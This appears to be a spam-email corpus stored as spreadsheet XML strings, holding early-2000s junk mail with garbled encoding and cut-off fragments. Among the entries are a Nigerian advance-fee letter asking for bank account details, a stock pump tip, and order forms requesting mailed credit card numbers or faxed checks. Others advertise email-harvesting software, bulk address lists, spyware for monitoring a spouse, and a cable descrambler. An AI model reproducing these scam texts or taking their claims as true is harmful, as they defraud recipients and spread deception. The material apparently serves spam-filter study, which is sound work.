      ourÂ last recommendation to buyÂ NXLC.Â  It rallied from $7.87 
      toÂ $11.73!Â Â 
ALL removes HONERED. Please allow 7 
      days to be removed and send ALL address to: honey9531@mail.net.cnÂ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t>
  </si>
  <si>
    <t xml:space="preserve">PEPPER SPRAY SELF DEFENSE SYSTEM...THIS SMALL INVESTMENT COULD
SAVE YOUR LIFE!Dear Member,Saydeal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$14.99 and shipping is free. If you have ever wanted to purchase
a self defense product for yourself or loved ones, please take the
time to review the site.
we hope we can make your summer just a little safer!http://www.saydeal.com/pepperspray/psc09This email complies with all current US regulations.  If you
wish to be removed from this list please reply to this email with
"REMOVE" in the subject.
</t>
  </si>
  <si>
    <t xml:space="preserve">
SAVE
                  up to 70% On Your Life Insurance!
Get
FREE
Life Insurance quotes from
the very best
                  companies at The
                  Lowest Rates.You
                  can't predict the future, but you can always prepare for it.Compare
                    rates from top insurance companies around the country
                    In our life and times, it's important to plan for your
                    family's future, while being comfortable financially. Choose
                    the right Life Insurance policy today.
Insurance
                    Companies Compete For Your Insurance.It's
                    fast, easy, and best of all... FREE. Â 
CLICK
                          HERE
                          FOR YOUR FREE QUOTE!
If you are in receipt of this email in error and/or wish to be
removed from our list, PLEASE CLICK HERE
AND TYPE REMOVE. If you reside in any state which prohibits e-mail solicitations
for insurance, please disregard this email.</t>
  </si>
  <si>
    <t xml:space="preserve">Fighting a Traffic Ticket?  Going through a Divorce?You need an Attorney!Take care of all your Legal needs for just pennies day.Finally-Affordable Legal Services!Send a email for more information THERE IS NO OBLIGATION
(SERIOUS ENQUIRIES ONLY)***Please include Name &amp; Phone # OR Info will not be Sent.***
               Email to: greatbizz115@yahoo.com
          Put LEGAL ASSISTANCE In the Subject________________________________________________ 
DISCLAIMER: 
======================================== 
NOTE: This e-mail is not Spam. You are receiving this 
e-mail because you have previously requested more info on a 
Business Opportunity or we have shared same opt-in or safe 
e-mail list or we have exchanged business opportunities in the 
past. If you are no longer interested in exchanging business 
opportunities, please send to the email below
rem876@yahoo.com    </t>
  </si>
  <si>
    <t xml:space="preserve">Dear fellow eBay user,I listed this CD on eBay a few months ago and here's 
what happened.  I got an email from Safeharbor saying 
that all my auctions had been cancelled and that the CD 
was permanently "banned" from being sold on eBay.  From 
then on, I called it the "Banned CD"!So why did eBay ban it?  Maybe they figured you shouldn't 
have access to this type of information, or maybe they 
didn't think we could cram all of these programs onto 
one CD Rom.  I'll let you decide.This CD will teach you things that eBay, Uncle Sam, and 
others just don't want you to know.  I am not responsible 
for how you use some of this information and it is 
provided for educational purposes only.  Here are just a 
few of the things you will learn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List of companies who will issue you a college 
    degree (including a Phd.) for a fee.  No study 
    required!***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don't have room to list!Ask yourself this question: where else will you find such
a HUGE collection of information and software on one CD? 
And who else would dare sell you a CD containing so much 
"contraband" info?  It was banned on eBay, has been 
prohibited in THIRTY THREE countries, and will soon be 
unavailable in the USA. If you wait more than a few days
to order this CD, I can't guarantee I will be able to 
sell it.  Get this CD *** NOW *** before it is banned forever!We accept Visa/Mastercard, Paypal, or cash/check/money order. 
To order the "Banned CD" right now for the super low price of 
only $19.99, Click on the link below to pay with a 
Visa or Mastercard. This will take you to our secure 
server for order processing: http://pheromone-labs.com/bannedc10.htmIf you have trouble accessing the link above,
please try this url instead:http://www.pheromone-labs.com/bannedc10.htmOr you may send cash, check or money order by filling out
the order form below.------------------------- CUT HERE -----------------------"Banned CD"
Price: $19.99 + $4.01 ShippingHOW TO ORDER BY MAIL: Print out this order form and
send cash, personal check, money order or cashier's
check to the address listed below:Quiksilver Enterprises
816 Elm St. #472
Manchester, NH 03101Your Shipping Information:Your Name_____________________________________________Your Address__________________________________________Your City_____________________________________________State / Zip___________________________________________Phone #: _____________________________________________
(For problems with your order only. No salesmen will call.)Email Address_________________________________________NOTE: Shipping is delayed by up to ten days on all mail-in 
orders.[ ] YES! Please rush order my "Banned CD"!!* Please check one of the following payment options:[ ] I am mailing my credit card number. (Note your 
card will be charged for $24.00)[ ] I am enclosing a check or money order for $24.00
If paying by credit card, please fill in the information 
below:
Credit Card Number:________________________________Expiration Date:___________________________Signature:_________________________Date:____________________
NOTE: This CD is for informational, educational, or 
entertainment purposes only.  Some of the activities
described on this CD may be illegal if carried out.
This CD contains links and addresses of companies
and individuals which produce various products, or
offer various services, which may be illegal in your
country, state, or city.  However, it is perfectly 
LEGAL to purchase and possess the Banned CD in the 
United States of America.  Contains approximately 
100 megs of information.Shipping outside USA add $10.00Send an email to "affiliate5@btamail.net.cn"
if you no longer wish to receive these mailings.{%rand%}0652CSum5-576ujoU6517niKG2-981mYeo8409wQVH2-459Giug8374xizz6-595PdFe8433GSl70
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
  I would like you to enjoy the same success
that I have had, since joining this program for FREE.
Cost you nothing to join!  PRE-BUILT DOWNLINE:  A full (2 wide x 10 deep) profit center will have 
a total of 2,046 people and a payout of up to $1,021,320.00 per year.The FASTEST way for us to help you build a HUGE DOWNLINE is to give away 
FREE MEMBERSHIPS to highly motivated prospects, like you, 
and help build a downline under them.  This is the FASTEST and MOST COST-EFFECTIVE WAY 
to build a productive downline!     WE ARE CURRENTLY RECRUITING OVER 1,000 NEW MEMBERS 
PER WEEK WITH OUR LIGHTNING FAST RECRUITING SYSTEM!!!Go to:
http://www.ircinconline.com/isb.htmCode Number  000-01-3118
PS... After I received my info pack, the company already 
had placed 30 people under me_________________________________________________________________
 DISCLAIMER To REMOVE yourself from my data base please hit REPLY and insert
REMOVE in the subject box.7211iAHr5-883Pbxd6893ZUNf7-464YxFl31
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Consumers, Increase your Business Sales! How??By targeting millions of buyers via e-mail !! 25 MILLION EMAILS + Bulk Mailing Software For Only $150.00super low price! ACT NOW !!!Our Fresh Addresses Will Bring You Incredible Results! If you REALLY want to get the word out regardingyour services or products, Bulk Email is the BEST way to do so, PERIOD! Advertising in newsgroups is good but you're competing with hundreds even THOUSANDSof other ads. Will your customer's see YOUR ad in the midst of all the others?Free Classifieds? (Don't work)Web Site? (Takes thousands of visitors)Banners? (Expensive and iffy)E-Zine? (They better have a huge list)Search Engines? (Easily buried with thousands of others)Bulk Email will allow you to DIRECTLY contact yourpotential customers. They are much more likely totake the time to read about what you have to offer if it was as easy as reading it via email ratherthan searching through countless postings in newsgroups.The list's are divided into groups and are compressed. This will allow you to use the names right off the cd. ORDER IN THE NEXT 72 hours AND RECIEVE 4 BONUSES!!ORDER IN THE NEXT 48 HOURS AND RECIEVE FULL TECHNICAL SUPPORT !!!ACT NOW !!!!!!!!!!!!!!*BONUS #1 Receive an additional cd-rom with millions of fresh, deliverable general internet e-mail addresses free!! *BONUS #2 Receive 2000 how to books, reports and manuals on cd-rom withreprint resale rights! Produce for pennies and resell for BIG dollars! *BONUS #3 Receive the Mass Mailer bulk delivery software, with fulloperating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INFORMATION:CHECK BY FAX SERVICES OR CREDIT CARD INFO: O R D E R N O W . . . SAME DAY SERVICE (M-F) if your orderis received before 3pm Central . To place an order, you can call us at: 1-308-650-5905 ext 121 Are fax your order to 1-415-873-2700   This Number is for credit Card Orders Only!!!CHECK BY FAX SERVICES! __________________________________________To order, via credit card simply cut/paste and print out theEZ ORDER FORM below and fax to our office today. ***** NOW ONLY $150! *****This "Special Price" is in effect for the next seven days,after that we go back to our regular price of $250.00 ...Don't delay... you can be in business tomorrow! We accept Visa, Mastercard, Amex, Disc and Checks by Fax.----------------------Cut &amp; Paste-------------------------------------------EZ Order Form---------------------_____Yes! I want everything! I am ordering within 72 hours.Include my FREE "Business On A Disk" bonus along with your Millions of E-Mail addresses on CD (plus 1,093,808 bonus addresses)for the special price of only $150.00 + shipping as indicatedbelow._____Yes! I missed the 72 hour special, but I am orderingCD WITH, super clean e-mail addresses within 7 days for the"special" price of only $250.00 + s&amp;h._____Oop's I missed the 72 hour and 7 day "specials". I amordering The Cd at the regular price of $250.00 + s&amp;h.***PLEASE SELECT YOUR SHIPPING OPTION***____I would like to receive my package FedEx OVERNIGHT. I amincluding $15 for shipping. (Hawaii &amp; Alaska $20 - Canada $25,all other International add an *additional* $25 [$40 total] for shipping)____I would like to receive my package FedEx 2 DAY delivery.I'm including $10 for shipping. (Sorry no Canada or Internationaldelivery - Continental U.S. shipping addresses only)***Please Print Carefully***NOTE: Orders cannot be shipped without complete informationincluding your signature. No exceptions!NAME____________________________________________________COMPANY NAME____________________________________________ADDRESS_________________________________________________(FedEx can only ship to street addresses - no P.O. boxes)CITY, STATE, ZIP________________________________________PHONE NUMBER____________________________________________(required for shipping &amp; tracking) EMAIL ADDRESS___________________________________________(Print Carefully - required in case we have a question and tosend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SIGNATURE:x_________________________________I understand that I am purchasing the e-mail address on CD,and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orderis received before 3pm Central . To place an order, you can call us at: 1-308-650-5905 ext 121 Are fax your order to1-415-873-2700 This Number is for credit Card Orders Only!!!CHECK BY FAX SERVICES!If you would like to fax a check, paste your check below and fax it to our office along with the EZ Order Form forms to: 1-415-873-2700 *************************************************************24 HOUR FAX SERVICES*** PLEASE PASTE YOURCHECK HERE AND FAX IT TO US AT 1-415-873-2700   **********************************************************If You fax a check, there is no need for you to mail theoriginal. We will draft a new check, with the exactinformation from your original check. All checks will beheld for bank clearance. (7-10 days) Make payable to: "S.C.I.S" -=-=-=-=--=-=-=-=-=-=-=offlist  Instructions=-=-=-=-=-=-=-=-=-=-=-=**************************************************************Do not reply to this message - mailto:heidilee2003@excite.com?Subject=offnow
**************************************************************1365fIFR5-655xnXn0181osWS3-239l28
</t>
  </si>
  <si>
    <t>With regards toWant to refinance?Fill out this quick form and immediately have mortgage
companies compete for you business. You will be offered the, absolute, BEST refinance rates 
available!Your credit doesn't matter, don't even worry about past 
credit problems, we can refinance ANYONE!Let Us Put Our Expertise to Work for You!http://66.230.217.86or site 2
http://agileconcepts.com/74205/
Erase
http://66.230.217.86/optout.htm</t>
  </si>
  <si>
    <t xml:space="preserve">What a Loan From Â Â LendersÂ Can Do For You:Â Â Â Rates Have Never Been Lower!!Lowest Rates - Best Possible TermsDEBT CONSOLIDATIONCHANGE THIS...YOUR BILLSBALANCEPAYMENTMasterCard$8,750$175Visa$10,500$210Discover$5,250$105Auto Loan$20,500$515TOTAL$45,000$1,005INTO THIS !!!BALANCEPAYMENTTOTAL$45,000$390.06Annual Savings: $7,379.005-year Savings: $36,896.00Â oPay off high interest credit cardsoReduce monthly paymentsÂ HOME IMPROVEMENToPaint, landscape, carpet, add rooms/pool/spaoYou may be eligible for a tax deductionÂ HOME REFINANCINGoReduce your monthly payments and get cash back!oGet up to 125% of your homes value (ratios vary by
state).We have hundreds of loan programs, including:Purchase LoansRefinanceDebt ConsolidationHome ImprovementSecond sNo Income VerificationNo matter which of our 50 states you live in, welikely have a program that could meet your needs!Please
CLICK HEREOne of our experienced loan officers will contact you
for more details concerning your needs.Want to be purged? Just go hereand we will promptly extract you. copyright DTI Inc.
</t>
  </si>
  <si>
    <t xml:space="preserve">FIND OUT WHO THEY ARE CHATTING/E-MAILING WITH ALL THOSE HOURS!Is your spouse cheating online? Are your kids talking to dangerous people on instant messenger?
Find out NOW! - with Big Brother instant software download.
Click on this link NOW to see actual screenshots and to order!
http://213.139.76.142/bigbro/index.asp?Afft=M30To be excluded from future contacts please visit:
http://213.139.76.69/PHP/remove.php
jthomason
</t>
  </si>
  <si>
    <t>Low-Cost Term-Life Insurance!
SAVE up to 70% or more on your term life insurance policy now.
Male age 40 - $250,000 - 10 year level term - as low as $11 per month.
CLICK HERE NOW For your FREE Quote!
http://211.78.96.11/insurance/
If you haven't taken the time to think about what you are paying for life insurance...now is the time!!!
We offer the lowest rates available from nationally recognized carriers.
Act now and pay less!
CLICK HERE 
http://211.78.96.11/insurance/
++++++++++++++++++++++++++++
Simple Removal instructions:
To be removed from our in-house list simply visit
http://211.78.96.11/removal/remove.htm
Enter your email addresses to unsubscribe.</t>
  </si>
  <si>
    <t xml:space="preserve">
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Â 
To
unsubscribe from this list, click here.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</si>
  <si>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x
</t>
  </si>
  <si>
    <t>Â Â Â Â Â Â Â Â Â Â  Want 
      To Harvest A Lot Of Target EmailÂ Â  
      Addresses In A Very Short Time?
Target Email Extractor isÂ  aÂ  
      powerfulÂ  EmailÂ  Software thatÂ  harvests Target Email 
      Addresses from search engines, any specified starting URLs , including cgi 
      , asp pages etc.
Â  It Quickly and automatically 
      search and spider from search engine, any specified starting URLs to find 
      and extract e-mail addresses
Powerful targeting ability. Only extract the specific email addresses 
      that directly related to your business.
Integrated with 18 top popular search engines: Yahoo, Google, MSN, 
      AOL
Fast Search Ability. Nearly can find thousands of e-mail addresses in 
      an hour, allowing up to 500 simultaneous search threads!
Helpful for anyone for internet Email marketing purposes.
Free version updates.Click The Following Link To Download This 
      Program:
Download Site 
      1
Download Site 
      2Â Â Â Â Â Â Â Â Â Â Â  
      ï¿½ï¿½IfÂ  you can not download this program ,Â  please 
      copy the following link into your URL , and then click " Enter" on your 
      Computer Keyboard.
Here is the 
      download links:http://www.wldinfo.com/download/email/ESE.zip
http://bestsoft.3322.org/onlinedown/ESE.zip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http://www.autoemailremoval.com/cgi-bin/remove.pl 
      . Auto Email Removal Company. Ref# 
      01222263545This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
  </si>
  <si>
    <t xml:space="preserve">To opt-out of our database  CLICK HERE
</t>
  </si>
  <si>
    <t xml:space="preserve">
AnÂ Â  I n f o r m a t i o n  Â 
  Â 
Â 
Â 
AnÂ Â  I n f o r m a t i o
n
in the age of
information
FINDING QUICKER SOLUTIONS AND SOLVING 
  PROBLEMS QUICKER
Â 
When you are fully booked and
overloaded 
  with work there are still the possibility to use theÂ ancient mental 
  working methods, used by successful people,Â instead of the risk for 
  stress and burn out problems.
Â 
These ancient methods for shortening 
  waiting time, adding power to a quicker decision, eliminating stress and
the 
  risk for burn out, are not so commonly used, despite the methodsÂ are 
  known from ancient time.
Â 
The power in the mental working
methods 
  claim for no extra energy consumption so the body will not get tired,
stressed 
  or burn out.
Â 
Please check the web
site:
www.scaninvent.com/mental.methods
Â 
In the compendium I, the
undersigned,Â will 
  reveile and explain my own methods - how I learned them and how I am
training 
  and exercizing them as well as the tactics in converting inner knowledge
to 
  outer reality the speediest way ever known.
Â 
You are most wellcome to study these 
  methods.
Â 
Best regards
TORE AKESSON
SVANEBACKEN AB
Hoganasvagen 79
S-260 40 VikenÂ Â 
-Â Â  
  Sweden</t>
  </si>
  <si>
    <t>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
  </si>
  <si>
    <t xml:space="preserve">FROM: DR. BEN KOKORICompliments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Nigeriaï¿½s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2002. The source of the funds is as follows: During the last military regime in Nigeria, government Officials set up companies and awarded themselves contracts that were grossly over-invoiced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U.S.$25,500,000.00 (Twenty Five million, five hundred thousand U.S.dollars). That is why I am writing you this letter.
We have agreed to share the money to be Transferred into your account, if you agree with our proposition as follows;  (i) 20%to the account owner (you). ( ii) 70% for us (the panel officials   (iii)10% to be used in settling all expenses(by both you and us) incidental to the actualization of this project.We wish to invest our share of the proceeds of this project in foreign stock markets and other business till we are ready and able to have access to them without raising any eyebrows here at home. Please note that this transaction is 100% safe and risk-free. We
Intend to effect the transfer within fourteen (14) banking days from the date of receipt of the following information through the fax number stated above_-:Your Bank's name, Companyï¿½s name, address, telephone and fax numbers and the account number into which  the funds should be paid. The above information will enable us write letters of claim and job description respectively. This way, we will use your companyï¿½s name to apply for the payment and backdate the award of the contract to your company. We are looking forward to doing this transaction with you and we solicit for your utmost confidentiality in this transaction. 
Please acknowledge the receipt of this letter using my direct Telephone number 234 1775 5791 and my America Internet Fax number 240 744 0416 or 801 516 7986 only.
It was acquired for the purpose of confidentiality. I will bring you into a more detailed picture of this transaction when I hear from you.Best regards,BEN KOKORI
                                                                                                                  </t>
  </si>
  <si>
    <t xml:space="preserve">Do you Have an Epson or Canon Printer?
Â 
Â 
        Do
        you Have an Inkjet or Laser Printer?Yes? Then we can SAVE
        you $$$ Money!
Our High Quality Ink &amp; Toner Cartridges come
        with a money-back guarantee, a 1-year
        Warranty*, and get FREE SHIPPING
        on ALL orders!
and best of all...They Cost
         30-70%  Less        than
        Retail Price!*Click here
        to visit Our Website!*or Call us Toll-Free @
        1-800-758-8084!
*90-day warranty on all remanufactured
        cartridges.Â 
Â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
</t>
  </si>
  <si>
    <t>Copy any DVD now!Copy Any DVD Movie Using Your CD 
Burner Now!Copy DVD Now makes it 
possible to copy
DVD on CD-R using your Computer's 
CD Burner.
You may now copy DVD movie with just one click.We provide latest and easiest Method that eliminates the 
use 
of conventional DVD copying equipments in DVD burning 
process.
This method uses advanced DVD rippers. 
 Copy DVD movies to CD-R, 
encode DVD
to VCD, SVCD, XVCD or XSVCD and even create your own 
chapters. 
 All you need is DVD 
ROM, CD Burner and Blank 
CD's. 
Why spend thousands of 
dollars on conventional 
DVD copying equipment when you may burn and copy DVD's right from 
your Computer's 
CD Burner.
You 
Can Copy Any DVD To CD - You Get Manual And Software 
Both Copy your DVD(PAL or NTSC) to CD using your CD burner
Make backup copy of DVD to CD-R or CD-RW
Play movie from computer, computer to TV or on 
any standard DVD Player
Make backup of your entire DVD collection
Make VCD, SVCD, XVCD or XSVCD in  ONE CLICK 
only.
 You may even fit entire DVD on one CD!
Create Chapters or time intervals on VCD or SVCDNo need of having 6-8 GB Free hard disk space!
What You Get In The 
PackageOur interactive Manual will walk you through the entire 
process of 
copying DVD as VCD, SVCD, XVCD or XSVCD.
You will be ripping DVD's and burning them to CD's like a 
Pro once 
you have gone through this easy to follow manual. We have 
also included 
screenshots for additional clarity to use. 
Instant downloadable access to the software. Stop waiting 
for the product to arrive 
in mail. 
Everything is provided to help you start copying your DVD's 
right 
away! All you need to have is DVD ROM, CD Burner and few 
blank CD's! 
That's it. No DVD burner or DVD copying equipment is 
required! 
And that's not all! If you buy it now you get FREE 
updates 
and upgrades for LIFE! Plus other bonuses. You get everything needed 
to right 
away start
copying and burning your DVD to CD. INSTANT DOWNLOAD!  
Win95/98/ME/NT/2000/XP Compliant LIMITED TIME OFFER!!! ONLY 
$39.95To order the DVD Burner right now for the super low price of only 
$39.95
with a Visa or Mastercard,
just fill out the order form below. 
FREE 
Bonus # 1
 Buy 
Today and you get FREE updates for LIFE!
 If you buy our package now, we will provide you upgrades 
and updates 
to all future versions of CopyDVD Now ABSOLUTELY FREE!!
This offer alone will save you tons of money for future 
upgrades and 
keep you updated with the technology. 
A 
real win win situation!!
 FREE 
Bonus # 2
Introducing a new technology that
PC Magazine calls "revolutionary" and The New York Times 
calls "ingenious."
Access 
and control your PC from anywhere in the world 
  with almost any operating 
system. Begin working on your host computer as if you were 
sitting 
in front of it. This
product is the CNET Editors' Choice pick for remote 
access, and they say 
"you'd be nuts not to sign up"
You get FREE 30 day trial when you buy our package of 
copydvdnow today.More InfoJoin our mailing list to be first to know about fresh 
quality
programs and utilities. Our list includes selected, tested and
quality freeware, shareware and other software only.  
*Legal Disclaimer*  
It is illegal to make copies of copyright material for the purpose 
of 
selling it to third party. Law provides you to make one back up 
copy for 
personal use. We do not encourage or promote piracy. This program 
is not 
meant for those who intend to break copy right law and indulge in 
illegal 
activities. This program serves merely as a guide to help end user 
to 
backup his personal DVD's. All applications suggested in this 
package are 
not sold as a part of this kit but are freeware and can be 
downloaded for 
free. By purchasing this package you agree to this disclaimer and 
also 
agree to use it in most ethical manner. You agree to waive all 
liabilities 
associated with this program to the provider and associates.
Â© copydvdnow.com All rights ReservedOrder Today .. Satisfaction is GUARANTEED or your money back!
Only
$39.95!
Order 
FormippingFirst Name:Last Name:Street Address:City, State, Zip: 
, 
Company: E-Mail: Phone: Comments:
Credit Card Type: (vvvv wwww
xxxx yyyy zzzz)
VisaMastercard 
Card Number:Expiration Date: 
 3121wkca6-841pMNzl16</t>
  </si>
  <si>
    <t xml:space="preserve">
The United States has a program, called Diversity Immigrant Visa
Lottery (better known as the Green Card Lottery), making available
each year by random selection 50,000 permanent residence visas
(Green Cards) to people from around the world. The objective of the
program is to issue Green Cards to individuals born in countries with
historically low levels of immigration to the United States.
A Green Card is a Permanent Residence Visa of the U.S.A. A Green Card
will give you legal right to work and live permanently in the United
States. Green Card holders receive health, education, and several other
benefits. If you win a Green Card, you can apply for U.S. Citizenship at
a later time. The Green Card does not affect your present citizenship.
You and your family could be lucky winners!
Your email address was obtained from a purchased list, Reference # 00193.  If you wish to unsubscribe
from this list, please Click Here.
If you have previously unsubscribed and are still receiving this message, you may email our
Abuse Control Center, or call 1-888-763-2497,
or write us at: NoSpam, 6484 Coral Way, Miami, FL, 33155.</t>
  </si>
  <si>
    <t xml:space="preserve">Learch			Sincerely,
			Your New Offers Staff
</t>
  </si>
  <si>
    <t>Â Increase
      Your Gas Mileageby up to 27%
      !!
* No TOOLS
      required!Â * Improves Power* Maximizes Energy
      * Improves MileageÂ * Improves TorqueÂ 
      * Cleaner EngineÂ * Smoother EngineÂ 
      * Reduces Emissions by 43%Â * Protects Catalytic ConvertersÂ * Prevents Diesel GellingÂ 
      * Improves Spark Plug LifeÂ * Maintenance Free* Pays for Itself within 60 days!
Installs
      in Seconds!A simple device that easily snaps over your fuel line.Â  Anyone can do it!
Guaranteed!
FULL REFUND if you are not satisfied with the result within THREE MONTHS from the date of purchase.
CLICK
      HEREHOW TO
UNSUBSCRIBE:
You received this e-mail because you are registered at one of our Web sites, or
on one of our partners' sites.
Â If you do not want to receive partner e-mail offers, or any email
marketing from us please click
here.
 [TE^3247(^(PO1:KJ)_8J7BJK9^":}H&amp;*TG0BK5NKIYs5]</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</si>
  <si>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mailto:affiliateoptout@btamail.net.cn?Subject=offarah
</t>
  </si>
  <si>
    <t>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07
5027ReYo8-086zKcv4695tdvr3-511Ilir9233WYsO9-473Auor9338JQXz2-3l58</t>
  </si>
  <si>
    <t xml:space="preserve">Newest Universal Cable Descrambler Box:  ViewMaster 4000 +
*** Watch ALL channels your local cable company offer. *** Fully Tested and Compatible with 98% of US cable network. *** 90 days money back guarantee !!! http://www.freshleadseveryday89.com/descrambler/
---------------------------------------------------------------------------------------------------
To be remove from farther mailing: simply replay to this message.
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi There,I wanted to spread this good karma to you.This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Michael.I do not have any connection to him. I am just spreading this good karma just to repay what he had did for me. I deeply know what ever he did it's a miracle to me. Even until today all I know was Michael chant for me &amp; many people.. And many miracle happened.I am sorry if this email annoy you. I am not promoting Michael or my business this email can be clearly seen.Please help spread this good karma around. Direct people to Michael. Creat good karma today for you future!Tan E.G.@pls: Click www.blessing-people.com    Go there to feel his energy!!
</t>
  </si>
  <si>
    <t xml:space="preserve">FIND OUT WHO THEY ARE CHATTING/E-MAILING WITH ALL THOSE HOURS!Is your spouse cheating online? Are your kids talking to dangerous people on instant messenger?
Find out NOW! - with Big Brother instant software download.
Click on this link NOW to see actual screenshots and to order!
http://213.139.76.142/bigbro/index.asp?Afft=M30To be excluded from future contacts please visit:
http://213.139.76.69/PHP/remove.php
blee
</t>
  </si>
  <si>
    <t xml:space="preserve">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Â 
 Hello,                  I have visited iiu.taint.org and noticed that your website is not listed on some search engines.
                  I am sure that through our service the number of people who visit your website will definitely increase. SeekerCenter 
                  is a unique technology that instantly submits your website 
                  to over 500,000 search engines and directories  
                  -- a really low-cost and effective way to advertise your site. 
                  For more details please go to SeekerCenter.net.                  Give your website maximum exposure today!
                  Looking forward to hearing from you.
Best 
                  Regards,
                  Vanessa Lintner
                  Sales &amp; Marketing 
www.SeekerCenter.net
Â 
Â 
Â 
Â 
Â 
Â 
 </t>
  </si>
  <si>
    <t xml:space="preserve">For your safe drive...and keep your safety with PersonalAlcoholDetector..For your safe drive...and keep your safety with Personal Alcohol Detector..Â 
The key technology for the function and performance of 
Personal Alcohol Detector is the gas sensor. Â We  use Advanced MEMS Gas Sensor 
with high accuracy.We are lookng 
for resellers, distributors to represent this product. If you are interested in dealing 
please feel free to contact us.Sincerely Yours,http://www.hyundaitrade.comThis message is in full compliance with U.S. 
Federal requirements for commercial email under bill S.1618 Title lll, Section 
301, Paragraph (a)(2)(C) passed by the 105th U.S. Congress and cannot be 
considered SPAM since it includes a remove mechanism.Â  If you are not interested 
in receiving our e-mails then please reply with a "remove " in the subject line.
</t>
  </si>
  <si>
    <t xml:space="preserve">
There are more financial opportunities out there than ever
before. The majority of those that succeed don't follow the
rules, they bend them, avoid them or go around them.Freedom 55 is for the suckers. You don't have to work 40 to
60 hours a week for 40 years all to make someone else wealthy.
We have a better way!Are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business.For more information about this incredible life changing
opportunity, please complete the form below. The information
is FREE, confidential and you are under no risk or obligations.
Name Â Â 
Address Â Â 
City Â Â 
State Â Â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WyomingZip Code Â Â 
Home Phone Â Â 
Time to Contact Â Â 
E-Mail Â Â 
Desired Monthly Income Â Â 
$500
$1000
$2500
$5000+
----------
To receive no further offers from our company regarding
this subject or any other, please reply to this
e-mail with the word 'Remove' in the subject line.vag7pu
</t>
  </si>
  <si>
    <t xml:space="preserve">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 Thank you.- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -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MajeeP.S. Someone recently sent the letter to me and it has been the most eye-opening, financially beneficial information I have ever received. I honestly believe that you will feel the same way once you've read it. And it's FREE! </t>
  </si>
  <si>
    <t xml:space="preserve">Â 
Increase 
      Your Sales Up to 1500%Â 
**** PAY NO SET-UP OR APPLICATION FEE 
      ****(LIMITED TIME 
      OFFER)
Call 
      (Toll-Free) 1- 888 - 707- 
      4777 with Coupon Code 
      #800 oruse our reply form 
      below for quickest results.Â We specialize 
      in businesses that would most likely be declined by other 
      processors:Retail
Home-Based Businesses
MLM's
Network Marketing
High Volume
Membership Sites
New Businesses
Good or Bad Credit
Adult Web Sites 
Account Features Include:EZ credit - 99% Approval 
        Rate
Secure real-time transactions 
        on your website.Â 
Application Fee of $195.00 &amp; 
        Electronic Check Set-Up Fee of $295.00 WAIVED!!
Terminal and printer or 
        software available!Â 
Equipment purchase or 100% tax 
        deductible EZ pay lease option available!Â 
Discount Rates as low as 
        1.58%!Â 
We pay for every person you 
        refer to us for processing! 
Coupon Code
First and Last 
            Name
Company 
            Name
Phone Number 
            where you can be reached
The best time to 
            call you
Email 
            Address
U.S. State or 
            Canadian Province
Select your 
            CountryUnited States choose
CanadaType of Business 
            (Optional)
 Standard 
              Retail Store 
              Front Establishments Outbound telemarketing
Catalog MO/TO merchants Dating services Airlines Subscriptions Discount Coupon Books
Audiotext House Party Plans Extended liability Home-Based Businesses
Foreign Corporations
Vitamin / Nutrition
Multi-Level 
              Marketers Electronic 
              cash Fulfillment 
              Centers Personals Advertising 
              (internet) Adult 
              Internet Sites Online 
              casino Other chooseMonthly revenue 
            in transactions (Optional) 
This offer only for U.S. residents, or Canadians with a 
      valid SS# and U.S. bank account.
Â To
    be removed from this list.
Under Bill S.1618 TITLE III SECTION 301. Per Section 301,
    Paragraph (a) (2) (C) passed by the 105th US Congress any email or Mass
    Marketing email cannot be considered Spam as long as the sender includes
    contact information and a method of removal. To be removed mailto: removed@removefactory.com
    and put "Remove" In the Subject line.To be removed from future mailings, please send a blank email to.qgncmtflpngnodveuomgyo
</t>
  </si>
  <si>
    <t xml:space="preserve">Â 
Increase 
      Your Sales Up to 1500%Â 
**** PAY NO SET-UP OR APPLICATION FEE 
      ****(LIMITED TIME 
      OFFER)
Call 
      (Toll-Free) 1- 888 - 707- 
      4777 with Coupon Code 
      #800 oruse our reply form 
      below for quickest results.Â We specialize 
      in businesses that would most likely be declined by other 
      processors:Retail
Home-Based Businesses
MLM's
Network Marketing
High Volume
Membership Sites
New Businesses
Good or Bad Credit
Adult Web Sites 
Account Features Include:EZ credit - 99% Approval 
        Rate
Secure real-time transactions 
        on your website.Â 
Application Fee of $195.00 &amp; 
        Electronic Check Set-Up Fee of $295.00 WAIVED!!
Terminal and printer or 
        software available!Â 
Equipment purchase or 100% tax 
        deductible EZ pay lease option available!Â 
Discount Rates as low as 
        1.58%!Â 
We pay for every person you 
        refer to us for processing! 
Coupon Code
First and Last 
            Name
Company 
            Name
Phone Number 
            where you can be reached
The best time to 
            call you
Email 
            Address
U.S. State or 
            Canadian Province
Select your 
            CountryUnited States choose
CanadaType of Business 
            (Optional)
 Standard 
              Retail Store 
              Front Establishments Outbound telemarketing
Catalog MO/TO merchants Dating services Airlines Subscriptions Discount Coupon Books
Audiotext House Party Plans Extended liability Home-Based Businesses
Foreign Corporations
Vitamin / Nutrition
Multi-Level 
              Marketers Electronic 
              cash Fulfillment 
              Centers Personals Advertising 
              (internet) Adult 
              Internet Sites Online 
              casino Other chooseMonthly revenue 
            in transactions (Optional) 
This offer only for U.S. residents, or Canadians with a 
      valid SS# and U.S. bank account.
Â To
    be removed from this list.
Under Bill S.1618 TITLE III SECTION 301. Per Section 301,
    Paragraph (a) (2) (C) passed by the 105th US Congress any email or Mass
    Marketing email cannot be considered Spam as long as the sender includes
    contact information and a method of removal. To be removed mailto: removed@removefactory.com
    and put "Remove" In the Subject line.To be removed from future mailings, please send a blank email to.vroepvkbimstotvtob
</t>
  </si>
  <si>
    <t>MCLE Seminars
Click 
            here 
            to be removed from our email list. You can also send an email or call us toll-free at (800) 456-6060
July 
              6-7 , 2002
              Cost: $795*
              Held at the HILTON Waikola Village, Hawaii
              Register and pay by June 7 and recieve 10% off! ($715.50)
*air, 
              hotel, and activities not included
"The 
              presentation was extremely informative and entertaining." 
"Fun 
              for the whole family... A great reason to take a vacation!"
**** 
            Limited Space Available 
            ****Hours
Includes 
                        12.5 hours of participatory:
6.0
                        Ethics
3.0
Substance 
                        Abuse
1.5
Emotional 
                        Distress
1.0
Elimination 
                        of Bias in the Legal Profession
1.0
General 
                        Legal EducationAudio Materials for remaining MCLE 
                        credits will be available at the seminar.
Brought 
                    to you by:
Â 
Bar 
                          Approved Curriculum
Approved 
                          by Arizona, Arkansas, California, Georgia, Idaho, Iowa, 
